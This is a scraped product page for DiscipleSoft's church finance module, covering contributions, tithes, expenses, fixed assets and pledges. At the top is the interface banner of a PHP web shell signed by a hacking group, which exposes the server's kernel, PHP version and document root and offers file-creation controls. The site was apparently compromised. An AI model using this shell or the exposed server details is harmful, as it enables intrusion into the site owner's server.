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Shell Bypass Mr.7Mind

Mini Shell By Mr.7Mind -+- RibelCyberTeam

  • PHP: Linux instance-3 5.4.0-1062-gcp #66~18.04.1-Ubuntu SMP Thu Jan 13 20:25:16 UTC 2022 x86_64
  • Doc Root: /var/www/html/dsweb
  • Server:
  • Domain :
  • Ip Server:
  • php Version: 7.4.16
  • Mysql: OFF
  • Curl: ON
  • [ Add New File ] [ Add New Directory ]
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    Excellent Finance and Admin - DiscipleSoft

    Excellent Finance and Admin

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    Estimated reading time: 2 min

    Every growing church should excel in the area of administration and financial management. Excellent administration and financial management are the bedrock for managing your church growth. Most church members are looking for churches that are well organised and manage finances in a proficient manner. This is because church financial accountability leads to credibility. It’s easy for members to offer their financial resources and time when they know that church leaders are good stewards of the resources.Our solution is designed to empower church leaders to manage church finances in a simple but effective approach. The solution comes with a number of reports that can be generated by the click of a button.

    Finance Management Module

    This is a comprehensive module designed to manage the full spectrum of your church finances. Cash inflows are divided into collective and individual contributions. The pledge management functionality also helps track fundraising projects including part payments from members. An embedded SMS and Email notification functionality is used to confirm individual payments like tithes and pledges. Below is a full list the finance management module functionality;


    Manage Collective Contributions

    All collective contributions like Sunday offering or Building Fund will be captured into the system. As the contributions are added they will form a database that has powerful search functionality for reporting purposes. From the database one can generate monthly, quarterly or annual reports or any other customised date. The generated reports can be exported into pdf, excel or csv. 

    Manage Individual Contributions

    Individual contributions like tithes can also be managed through the system. When a tithe is captured on the system, the tither will automatically receive a confirmation message through SMS, thanking them for their offering and confirming the amount. Other individualised contributions can also be added into the system. Once individual contributions have been captured one can generate many standard or customised reports using the same filter highlighted above.

    Manage Expenses

    Management of expenses involve the capturing of all expenditure in the church. The system will help your church meticulously manage all expenses in the church. Expense management is a key part of maintaining a healthy financial status for your church. Through this expense section one is able to add into a database a list of regular suppliers. One is also able to generate a number of expense reports.

    Manage Fixed Asset Register

    This functionality involves the capturing of all fixed assets that the church owns into a fixed asset register. Churches need to guard against the abuse of the assets that belong to the church by ensuring that there are strong tracking and control systems. With a well managed fixed asset register it is easy to conduct periodic asset audits.

    Pledge Management

    For most churches, pledge campaigns are an effective way of raising financial support around a specific project or need. Ideally this project or need is significant or emotionally-engaging enough to arouse a sense of urgency within the congregation. Building urgency and momentum is one sure-fire way to ensure that the pledge campaign will be successful. Using DiscipleSoft, members can make their pledges. Once pledges have been created by the member, they will be able to track their payment towards the pledge over a period of time, this includes the management of part payments.

    Financial Reporting 

    Visit the Free Trial section on more information on how you can test drive this powerful tools and see they will impact your church growth. Please feel free to share the Church Growth Toolkit.

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